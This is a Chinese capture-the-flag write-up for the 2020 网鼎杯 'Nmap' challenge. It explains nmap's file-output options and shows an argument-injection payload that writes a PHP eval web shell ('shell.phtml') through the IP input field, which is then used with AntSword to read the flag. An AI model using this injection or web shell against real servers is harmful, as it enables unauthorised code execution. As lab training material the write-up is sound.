首页 > 其他分享 >[网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmap

时间:2024-04-10 09:56:52浏览次数:26  
标签:0.1 shell Nmap phtml nmap 2020 网鼎杯

[网鼎杯 2020 朱雀组]Nmap

1c3Kkpgw_gNBZDq_hYPwz13PGzOR8OY3R7wKy1XNC4o

类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1

k8UqC9FtPdRLShgLeHtRAWbH5H9CBrNtXpCWIH50kFI

nmap 命令将扫描结果保存在文件里面:

例如:将nmap 127.0.0.1的结果保存在test.txt里面

nmap 127.0.0.1 -oN test.txt

nmap其他写文件命令:

-oN (标准输出)

-oX (XML输出)

-oS (ScRipT KIdd|3 oUTpuT)

-oG (Grep输出)

-oA (输出至所有格式)

这样我们就能写shell

<?php @eval($_POST["cmd"]);?> -oG shell.php

回到题目测试得到:

EzosbMpmMZCH9kn_b2FhlxUotc1pHr3rl3QnxhoDEkM

用phtml代替php仍然不行

查看了一下师傅们的WP,发现和[BUUCTF 2018]Online Tool一样

改为

' <? @eval($_POST["cmd"]);?> -oG shell.phtml '

DiCJH97y9Ww-NqoPUpN4pLq_Xi5cbGfLlcKC7Yxb1zk

查看写入的文件,即访问shell.phtml:

Ep4RXIHWoVvf4LgXsi8FA0IJEH9G16jfu-ipVJEAyoU

然后用蚁剑连接

pFVQ2BQRNCrTlnNM_jryL3iF6DWSDPZthXYnnimAEZ4

SREVEzxtCdjGxiLeMsccyUH9v184QnSddEOjPwmg4z8

主目录下发现flag

jkdy1EUxFv_2kcvdiW1XzvQROSEMugisI-2uOFGg-Xk

LYElBjP3JCOb1H7CRhwoCVvjwkXxdJxUNOH9FpcgUag

标签:0.1,shell,Nmap,phtml,nmap,2020,网鼎杯
From: https://www.cnblogs.com/fishjumpriver/p/18125385

相关文章

  • tomcat AJP 任意文件读取/包含漏洞(CVE-2020-1938)
    漏洞描述TomcatAJP协议中存在缺陷,攻击者可以读取或包含Tomcat的webapp目录中的任何文件。漏洞危害:读取webapp配置文件或源代码。如果攻击者读取配置文件得到敏感用户名和下面,tomcatWeb应用开放manager目录具有文件上传功能2.1可以直接上传shell获取控制权,2.2通过Gho......
  • 美国新冠疫情日数据正在更新中!可以下载「.xls」2020-2024年美国疫情大数据查询
    美国新冠疫情日数据,数据更新至2024/4/97:06:08美国新冠疫情昨日数据正在更新:新增是923例。再看一下各州吧:New-York新冠疫情昨日新增是:504发一个美国的新增总图:15个月的折线趋势图2020-2024年美国疫情大数据查询及下载EXCEL表:发一个20天的美国疫情数据表下......
  • 在Linux中,什么是端口扫描?如何使用工具如nmap进行端口扫描?
    在Linux中,端口扫描是一种网络诊断和安全审计技术,通过该技术可以发现远程或本地主机上运行的服务及其所使用的网络端口的状态。端口扫描器发送特定类型的网络数据包到目标主机的不同端口号,根据返回的响应判断端口是否开放、关闭或被防火墙屏蔽。端口扫描可以帮助系统管理员检查自......
  • buuctf[ACTF2020 新生赛]BackupFile
    看题目的名称和首页的提升不难拆到这是一题关于网站页面备份的题目。直接访问index.php.bak,就可以得到一个文件,把文件打开可以得到一串PHP代码<?phpinclude_once"flag.php";if(isset($_GET['key'])){$key=$_GET['key'];if(!is_numeric($key)){e......
  • 上海计算机学会2020年5月月赛C++丙组T2计算GPA
    题目背景GPA是GradePointAverage的简写,是高校采用的一种评估学生成绩的制度。题目描述要计算一个学生的GPA,先将每门学科的等第换算成为一个绩点,规则为:等第 A 为 44 分;等第 B 为 33 分;等第 C 为 22 分;等第 D 为 11 分;如果有 + 号后缀,则加 0.30.3 ......
  • [WUSTCTF2020]spaceclub
    [WUSTCTF2020]spaceclub附件是一个txt文件,打开发现是空白的ctrl+a全选下发现还是有内容的通过脚本进行替换,长的替换为1,短的替换为0importbinasciif=open("attachment.txt","r")content=f.readlines()s=""forlineincontent:iflen(line)==7:s+="0&qu......
  • [UTCTF2020]zero
    [UTCTF2020]zero附件是一个txt文件,打开来看文字好像有重影放入kali中发现是零宽字符隐写网站在线解码下得到flagutflag{whyNOT@sc11_4927aajbqk14}......
  • ES2020新特性
    ES2020新特性ES2020已经发布了,一共出9个新特性,下面让我们一起来了解下。String.prototype.matchAll()可一次性取出所有匹配,但是返回的是一个遍历器(Iterator),而非数组。可以用forof循环取出。相对于返回数组,返回遍历器的好处在于,如果遍历结果是一个很大的数组,那么遍历器比较节......
  • LG_P8728 [蓝桥杯 2020 国 B] 填空问题 题解
    蓝桥杯2020国BP8728题解A题直接写Python暴力一下。Output:563故答案为\(563\)。B题直接写Python暴力一下(欸怎么又来了)。总之就是写一个DFS,枚举每一个向外走,步数\(x\)满足\(x\le2020\)的点就好啦!Output:20312088故答案为\(20312088\)。C题直......
  • Luogu P8710 [蓝桥杯 2020 省 AB1] 网络分析 题解 [ 绿 ] [ 带权并查集 ]
    原题分析本题由于从一个节点发信息,同一个集合内的所有点都会收到信息,显然是一道要求维护各节点间关系的题,因此采用并查集的数据结构进行求解。但由于维护关系的同时还要维护权值,所以采用带权并查集,它是一种能维护某个节点与其祖宗节点之间关系的数据结构。带权并查集找父亲的......